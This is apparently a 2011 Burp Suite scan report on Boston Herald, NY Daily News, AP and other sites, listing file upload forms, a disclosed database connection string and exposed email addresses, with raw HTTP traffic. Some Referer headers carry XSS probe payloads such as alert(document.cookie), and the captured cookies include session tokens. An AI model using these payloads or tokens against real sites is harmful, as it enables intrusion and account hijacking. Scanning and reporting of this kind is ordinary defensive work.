<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<!-- Test 1x1 Leaderboard code -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

19. File upload functionality
There are 2 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


19.1. http://www.bostonherald.com/about/contact/news_tip.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/contact/news_tip.bg

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /about/contact/news_tip.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</div>
<input type="file" name="file" id="file" value="" />&nbsp;
<span id="additional">
...[SNIP]...

19.2. http://www.bostonherald.com/sports/football/patriot_moments/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /sports/football/patriot_moments/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /sports/football/patriot_moments/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<TD ALIGN="CENTER"><input id="marImage" name="image" type="file" value="" style="width:300px;"></TD>
...[SNIP]...

20. Database connection string disclosed

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following database connection string was disclosed in the response:

Issue background

A database connection string specifies information about a data source and the means of connecting to it. In web applications, connection strings are generally used by the application tier to connect to the back-end database used for storing application data. They are usually read from server-side configuration files or hard-coded into application source code.

Issue remediation

It is almost never necessary for applications to disclose database connection strings to clients. You should review the reason for the disclosure and prevent it from ever happening.

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")
   sconnString = "Provider=SQLOLEDB.1;Password=" & sTalismaPwd & ";Persist Security Info=True;User ID="& sTalismaUserName & ";Initial Catalog=" & sTalismaDBName & ";Data Source=" &sTalismaServerName

   objADOConnection.Open sconnString
   Call Chec
...[SNIP]...

21. Email addresses disclosed
There are 231 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


21.1. http://assets.nydailynews.com/js/nydn-pack-20101001.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/nydn-pack-20101001.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/nydn-pack-20101001.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=14515200
Content-Type: application/x-javascript
Content-Language: en
Age: 3426409
Date: Fri, 28 Jan 2011 14:14:28 GMT
Last-Modified: Sun, 19 Dec 2010 22:26:42 GMT
Expires: Sun, 05 Jun 2011 22:31:04 GMT
Connection: keep-alive
Content-Length: 163856

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

21.2. http://boston30.autochooser.com/results.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
<a href="mailto:carfind@carfind.com">
...[SNIP]...

21.3. http://bostonherald.com/blogs/entertainment/the_assistant/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/entertainment/the_assistant/

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:megan.johnson@bostonherald.com">megan.johnson@bostonherald.com</a>
...[SNIP]...

21.4. http://bostonherald.com/blogs/lifestyle/fork_lift/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /blogs/lifestyle/fork_lift/

Issue detail

The following email address was disclosed in the response:

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<a href="mailto:forklift@bostonherald.com">forklift@bostonherald.com</a>
...[SNIP]...

21.5. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:lsweet@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">-lsweet@bostonherald.com</div>
...[SNIP]...

21.6. http://bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/your_tax_dollars.bg HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:newstips@bostonherald.com">newstips@bostonherald.com</a>
...[SNIP]...

21.7. http://bostonherald.com/projects/your_tax_dollars.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/your_tax_dollars.bg?src=Mefa HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

21.8. http://bostonherald.com/sports/football/patriots/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /sports/football/patriots/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /sports/football/patriots/view.bg?articleid=1312526 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:irapoport@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:none">irapoport@bostonherald.com</div>
...[SNIP]...

21.9. http://bostonherald.com/track/inside_track/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view.bg?articleid=1312557&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...
<div id="articleTagline" style="display:block">Listen to the Track at 8:20 a.m. today on WAAF 107.3 and 97.7 FM. Drop dimes to trackgals@bostonherald.com and friend us at the Track Gals at Facebook.com. Follow us on Twitter!</div>
...[SNIP]...

21.10. http://events.cbs6albany.com/javascripts/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /javascripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/s_code.js HTTP/1.1
Host: events.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; Zvents=fnr9vfxsab

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 28 Jan 2011 17:37:24 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 03 Nov 2010 06:07:09 GMT
Connection: keep-alive
Expires: Sat, 29 Jan 2011 17:37:24 GMT
Cache-Control: max-age=86400
Content-Length: 39869

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

21.11. http://events.cbs6albany.com/opensearch/description150.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /opensearch/description150.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /opensearch/description150.xml HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:02 GMT
Content-Type: text/xml
Content-Length: 1168
Last-Modified: Fri, 28 Jan 2011 08:15:40 GMT
Connection: keep-alive
Expires: Sun, 30 Jan 2011 05:28:02 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>Zvents: Discover Things To Do</ShortName>
<Description>Use to discover things to
...[SNIP]...
<Contact>support@zvents.com</Contact>
...[SNIP]...

21.12. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The following email address was disclosed in the response:

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<a href="mailto:soundings@starrcorp.com?subject=Soundings Subscription Inquiry">
soundings@starrcorp.com</a>
...[SNIP]...

21.13. http://hosted.ap.org/static/js/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hosted.ap.org
Path:   /static/js/prototype.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/prototype.js HTTP/1.1
Host: hosted.ap.org
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITE=MABOH; SECTION=DJSP_COMPLETE

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Fri, 07 Dec 2007 07:41:57 GMT
ETag: "3437b2-d792-440ad618d1b40"
Accept-Ranges: bytes
Content-Length: 55186
Content-Type: text/x-js
Date: Sat, 29 Jan 2011 14:31:11 GMT
Connection: close

/* Prototype JavaScript framework, version 1.5.0_rc0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

21.14. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

21.15. http://support.moxiesoft.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...
<a href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.16. http://twitter.com/LibertyHotel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /LibertyHotel

Issue detail

The following email addresses were disclosed in the response:

Request

GET /LibertyHotel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-37638-22569
ETag: "6f06fb302d73fdde5809f33e541f4c86"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01451
Content-Type: text/html; charset=utf-8
Content-Length: 48481
Pragma: no-cache
